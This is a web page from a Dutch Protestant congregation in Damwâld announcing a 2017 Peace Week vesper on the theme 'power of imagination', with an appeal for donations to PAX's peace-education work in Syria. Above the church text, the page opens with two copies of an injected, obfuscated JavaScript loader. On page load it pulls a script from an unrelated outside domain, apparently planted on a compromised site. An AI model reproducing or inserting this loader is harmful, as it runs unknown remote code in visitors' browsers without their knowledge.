;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vredesweek 2017 - PKN Damwâld
22 september 2017
19:30 t/m 20:30
Benedictuskerk
Vredesweek 2017Vredesvesper

Ook dit jaar organiseren de Doopsgezinde kerk en  de Hervormde gemeente in  Damwâld  een Vredesvesper in de Vredesweek. Het thema is de ”Kracht van verbeelding”.
De kracht van verbeelding is geloven dat het anders kan en dat laten zien en delen met anderen!
Het is een krachtenbundeling van jong en oud, van vriend en vijand. We zijn elkaar gegeven en zullen het met elkaar moeten doen. Overal leven toekomstdromen, op scholen, in kerken, in asielcentra, op straat, in bedrijfsleven, op kantoor en in de politiek.
De kracht van verbeelding is je ook laten verassen door een ander inzicht op de realiteit die wij delen, maar die zoveel meer biedt dan wij vaak  geloven. Het betekent goed luisteren en kijken naar onze eigen beelden en die van anderen.
Kloppen die beelden wel? Op welke principes, welke waarden zijn de mens- en wereldbeelden gebaseerd? Welke richting gaan we op?
Pax wil dat gesprek en de ontmoeting tussen mensen met verschillende visies bevorderen.
Concreet  stellen we ons voor dat verschillende activiteiten in de vredesweek zich kunnen richten op het luisteren naar en het bevragen van elkaars beeld van goed samenleven”.
Ontmoetingen, waarbij luisteren naar elkaars visioenen centraal staat of een gezamenlijk doel voor ogen komt: samenleven in de buurt, hoe ziet dat eruit? Hoe zien we de toekomst van onze kinderen?
De Vesper wordt op  vrijdag 22 september om 19.30 uur gehouden en is in de Benedictuskerk, Doniawei 76, Damwâld.

Collecte vredesweek
Deze vredesweek vragen wij u / jullie hulp voor “Lessen in Vrede” in Syrië. Met gevaar voor eigen leven zetten moedige Syriërs zich in voor vrede in hun stad, dorp of wijk.
Zij blijven geloven in een Syrië waar jongens en meisjes van verschillende religieuze en etnische achtergronden samen kunnen komen. In de plaatsen als Saraqeb, Kobane en Hassakeg organiseren vredesactivisten allerlei activiteiten voor jongeren, zodat ze leren wat samen spelen en leren in vrede betekent. In alle drie plaatsen is het nu relatief rustig, maar hebben mensen verschrikkelijke dingen meegemaakt. Angst voor de ander speelt een grote rol en daarom is het belangrijk dat kinderen leren om geen vooroordelen te hebben over mensen die niet tot de eigen groep horen.
In het stadje Saraqeb organiseert Ahmed theater en spel om jongeren een lichtpunt te geven en mensen  weer even te laten lachen. Dit doet hij samen met jongeren in zijn buurt, zodat zij ook weer met iets constructiefs bezig zijn. Ahmed gelooft in een andere toekomst voor hemzelf en de Syrische jeugd. In Kobane komt sinds 2015 de wederopbouw weer op gang. Veel scholen liggen nog in puin en kinderen worden daarom opgevangen in geïmproviseerde buurtcentra. Bozan en zijn collega’s  organiseren dagelijks verschillende culturele en sportieve activiteiten voor tientallen kinderen en jongeren. Dit helpt hen bij hun traumaverwerking. In  Hassakeh  zet Lina samen met anderen een centrum op waar iedereen welkom is:
Koerden, Arabieren, moslims, christenen en yezidi’s.
Wie “Lessen in vrede wil steunen”, kan een bijdrage overmaken op: IBAN NL03 TRIO 03905150 00 t.n.v. PAX in Utrecht o.v.v. “lessen in vrede”

Locatie: BenedictuskerkDoniaweg 76 Damwâld